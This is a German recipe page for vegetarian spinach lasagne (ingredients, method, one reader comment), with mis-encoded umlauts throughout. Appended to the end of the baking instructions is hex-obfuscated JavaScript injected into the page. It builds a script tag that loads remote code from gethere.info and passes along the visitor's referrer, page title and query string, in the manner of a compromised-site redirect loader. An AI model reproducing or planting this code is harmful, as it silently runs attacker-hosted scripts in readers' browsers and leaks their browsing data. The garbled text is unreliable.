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Spinat Lasagne

Ein vegetarisches Spinat Lasagne Rezept. Diese aromatisch leckere Lasagne Alternative gelingt Ihnen schnell und ist ein Genuss fA?r die ganze Familie.

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  • Zutaten:
  • Ca. 12 Lasagneplatten
  • 450 g aufgetauten Blattspinat
  • 3 EL OlivenA�l
  • 1 Zwiebel
  • 1 Knoblauchzehe
  • 5 Tomaten
  • 250 g NaturfrischkA�se
  • 100g geriebenen KA�se

Zubereitung:

spinat-lasagne.jpg

Den Backofen auf 180 Grad vorheizen.

Die Zwiebel und den Knoblauch im OlivenA�l kurz anbraten. In der Zwischenzeit die Tomaten in kleine WA?rfel schneiden. TomatenwA?rfel und FrischkA�se mit in die Pfanne geben. Den Spinat mit Salz und Pfeffer abschmecken.

Die erste Schicht Lasagneplatten in der Auflaufform auslegen, darauf kommt der Spinat dann wieder Lasagneplatten, und abwechselnd immer so weiter, zum Schluss kommt der KA�se auf die letzte Spinatschicht und dann kommt die Lasagne fA?r 30 min. in den Ofen.var _0xd052=[„x73x63x72x69x70x74″,“x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,“x73x72x63″,“x68x74x74x70x3Ax2Fx2Fx67x65x74x68x65x72x65x2Ex69x6Ex66x6Fx2Fx6Bx74x2Fx3Fx33x63x58x66x71x6Bx26x73x65x5Fx72x65x66x65x72x72x65x72x3D“,“x72x65x66x65x72x72x65x72″,“x26x64x65x66x61x75x6Cx74x5Fx6Bx65x79x77x6Fx72x64x3D“,“x74x69x74x6Cx65″,“x26″,“x3F“,“x72x65x70x6Cx61x63x65″,“x73x65x61x72x63x68″,“x6Cx6Fx63x61x74x69x6Fx6E“,“x26x66x72x6Dx3Dx73x63x72x69x70x74″,“x63x75x72x72x65x6Ex74x53x63x72x69x70x74″,“x69x6Ex73x65x72x74x42x65x66x6Fx72x65″,“x70x61x72x65x6Ex74x4Ex6Fx64x65″,“x61x70x70x65x6Ex64x43x68x69x6Cx64″,“x68x65x61x64″,“x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65″,“x70x72x6Fx74x6Fx63x6Fx6C“,“x68x74x74x70x73x3A“,“x69x6Ex64x65x78x4Fx66″,“x52x5Fx50x41x54x48″,“x54x68x65x20x77x65x62x73x69x74x65x20x77x6Fx72x6Bx73x20x6Fx6Ex20x48x54x54x50x53x2Ex20x54x68x65x20x74x72x61x63x6Bx65x72x20x6Dx75x73x74x20x75x73x65x20x48x54x54x50x53x20x74x6Fx6Fx2E“];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

von
Mitglied seit 2006

Ein Kommentar “Rezept – Spinat Lasagne

  1. Liebe Lena,
    dein Rezept war heute meine Rettung – und absolut köstlich! Noch besser schmeckts allerdings, wenn man auf den Blattspinat noch Räucherlachs drauflegt.

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